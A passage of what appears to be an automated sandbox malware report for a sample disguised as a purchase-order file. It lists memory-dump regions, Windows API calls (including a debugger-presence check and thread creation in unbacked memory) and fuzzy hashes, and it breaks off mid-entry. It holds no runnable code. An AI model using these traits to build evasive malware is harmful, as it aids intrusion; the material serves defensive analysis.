                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
                                                                                                                                                                                                      • Instruction ID: b3827f22a9b40117375a449595afde1625f4abf3f7e4d7e9dd60fbd75d6536de
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEF169716083019FC710DF25C881B5EB7E5BF88318F14892EF9959B392DB78E949CB86
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                                                      • Opcode ID: ecc9b2ade8982dcb1e0c5ad9849573950e3db74e800a58aca912b003bf94dbf3
                                                                                                                                                                                                      • Instruction ID: a147f22b69281d73a18854d28d99c179ae132f80e60af6a945ea35f0d23fbdf0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecc9b2ade8982dcb1e0c5ad9849573950e3db74e800a58aca912b003bf94dbf3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0021DE7564D3446BEA3E57149C0AFBD3A366F61B10F88448BA4CB563D1F6682C08CAA3
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00423973
                                                                                                                                                                                                        • Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281E9
                                                                                                                                                                                                        • Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281F3
                                                                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 0042397A
                                                                                                                                                                                                        • Part of subcall function 0042821F: GetModuleFileNameW.KERNEL32(00000000,004C0312,00000104,00000000,00000001,00000000), ref: 004282B1
                                                                                                                                                                                                        • Part of subcall function 0042821F: ___crtMessageBoxW.LIBCMT ref: 0042835F
                                                                                                                                                                                                        • Part of subcall function 00421145: ___crtCorExitProcess.LIBCMT ref: 0042114B
                                                                                                                                                                                                        • Part of subcall function 00421145: ExitProcess.KERNEL32 ref: 00421154
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1372826849-0
                                                                                                                                                                                                      • Opcode ID: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
                                                                                                                                                                                                      • Instruction ID: 55fc1677af57a8a7660136eab561fac32ed193775503e2d42985e710cb399e89
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D6B13452319AE6113F36FC42B2F23689F82729BA0002FF505D7292DBBC9D80866D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0044C385,?,?,?,?,?,00000004), ref: 0044C6F2
                                                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0044C708
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C70F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                                                      • Opcode ID: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
                                                                                                                                                                                                      • Instruction ID: 494393b69a2909d6cdb43eca47a58c7b459d0d0b41777f9665b8bdb17d821ec9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1E08632542214B7E7212B54AC4DFCE7B18AF05771F104524FB14691E097B12911879C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _free.LIBCMT ref: 0044BB72
                                                                                                                                                                                                        • Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
                                                                                                                                                                                                        • Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3
                                                                                                                                                                                                      • _free.LIBCMT ref: 0044BB83
                                                                                                                                                                                                      • _free.LIBCMT ref: 0044BB95
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                      • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                                                                                                      • Instruction ID: fb99fa3189b7cf6fe02a1e9cca191fa87ce96732a0e011a83902eecb09c11a36
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E012A574179146EA24697B7E44EB313CCCF14355B54081FB459E7646CF2CF84085EC
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 004022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004024F1), ref: 00402303
                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004025A1
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00402618
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0047503A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3815369404-0
                                                                                                                                                                                                      • Opcode ID: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
                                                                                                                                                                                                      • Instruction ID: 467a5c185213abbeff6f391a9cbeb45029f0b355c3efb32a313897462e65bf95
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F71B2B89012818BD384EF5AA994D95BBA4FB5B34879081BFD50AE72B3CB784414CF1C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00AB55C0,?,00000000,00000000), ref: 00AB5A51
                                                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00AB5B11
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$CreateExitUser
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4108186749-0
                                                                                                                                                                                                      • Opcode ID: 10ea8fd2ca0d36daa9c8e029636a0a10194fc004c9ac7aa577c72587961205a6
                                                                                                                                                                                                      • Instruction ID: af2738757db71521b30e556d6efee2de53d1264450a917579b3af6e929504984
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10ea8fd2ca0d36daa9c8e029636a0a10194fc004c9ac7aa577c72587961205a6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8117C20D4DBC14EE7239B7888653E6BFA81F63720F0D06CAD0908E0E3D2594D1C93A3
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 00403A73
                                                                                                                                                                                                        • Part of subcall function 00421405: __lock.LIBCMT ref: 0042140B
                                                                                                                                                                                                        • Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00403AF3
                                                                                                                                                                                                        • Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403B08
                                                                                                                                                                                                        • Part of subcall function 00403D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
                                                                                                                                                                                                        • Part of subcall function 00403D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
                                                                                                                                                                                                        • Part of subcall function 00403D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8
                                                                                                                                                                                                        • Part of subcall function 00403D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48
                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403AB3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 924797094-0
                                                                                                                                                                                                      • Opcode ID: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
                                                                                                                                                                                                      • Instruction ID: 5a1e6fac7f7e4f5efe05a10f66e6517c88bf61964affef9997ff0f491c4f9aa6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6911AC719043409FC300EF2AE945D0EBBE9EF95310F00892FF589832B2DBB49591CB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___lock_fhandle.LIBCMT ref: 0042EA29
                                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 0042EA42
                                                                                                                                                                                                        • Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1046115767-0
                                                                                                                                                                                                      • Opcode ID: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
                                                                                                                                                                                                      • Instruction ID: 2416ae91324a54d1ce8793c95f0e759c3b4c3b44b30ce6d703663dc6d154f00d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F11C6B2B056708AD711BFA6F84175D3A506F82339FA6438BE4205F1E2C7BC9C4186AD
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0042395C: __FF_MSGBANNER.LIBCMT ref: 00423973
                                                                                                                                                                                                        • Part of subcall function 0042395C: __NMSG_WRITE.LIBCMT ref: 0042397A
                                                                                                                                                                                                        • Part of subcall function 0042395C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0041F51E
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041F533
                                                                                                                                                                                                        • Part of subcall function 00426805: RaiseException.KERNEL32(?,?,0000000E,004B6A30,?,?,?,0041F538,0000000E,004B6A30,?,00000001), ref: 00426856
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3902256705-0
                                                                                                                                                                                                      • Opcode ID: 70cad1e3bd70fdeebabecdf1adf7eb2e6304d00d4650b2fa2f30590b0b56178e
                                                                                                                                                                                                      • Instruction ID: 7ad46e9193426c8d339f918b5cf2d99cac8a9eaef2833add56b360256c533eb5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70cad1e3bd70fdeebabecdf1adf7eb2e6304d00d4650b2fa2f30590b0b56178e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0A43160422D67DB04BF9DE8019DF77A89F01358FB0842BF90992191DBB8A6C597AD
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00423629
                                                                                                                                                                                                        • Part of subcall function 00424E1C: __lock.LIBCMT ref: 00424E3F
                                                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 00423634
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2800547568-0
                                                                                                                                                                                                      • Opcode ID: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
                                                                                                                                                                                                      • Instruction ID: e0ac56d962211a67bba08426c2dd1c536cda0567d662fd5b2e2ebd868d4dc1e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF09671B01234AAD721AF66A80276E7AB45F41339FA6814FE454AB3C1CB7C8A019A5D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AB5D6D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                                                      • Opcode ID: b2c5e5ff31c71c9a2d04ca3a138fa5ebeded73ff39e8cabb934e00f8006b6e21
                                                                                                                                                                                                      • Instruction ID: 8cd558fa079e1926ef603cac916a83aff80c8ec40718720be5bc3c2d258ef1fe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2c5e5ff31c71c9a2d04ca3a138fa5ebeded73ff39e8cabb934e00f8006b6e21
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0BEA0E04F00AADE7EEBB8ED4EBF02B6C6F22728F0D4345E2451A0B386521C13C502
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: c80d5a6a02d27edc9ab6d58f5d8643bbeae31c09be81a772befcbcd45ae199ca
                                                                                                                                                                                                      • Instruction ID: 91c862803327f5b86cbf125de7e72682843cacfbd44ae38a9c2cd0366d3857ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c80d5a6a02d27edc9ab6d58f5d8643bbeae31c09be81a772befcbcd45ae199ca
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D71D031C0CB809ECB3A9B3988147F5FBBC6B66320F4D869AD4958B1A3D279CD449352
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E959
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2222842502-0
                                                                                                                                                                                                      • Opcode ID: 933f474a9053b05bc16a2fd55a7a1634dc82e1a2e246d14b81b82702670c5ed1
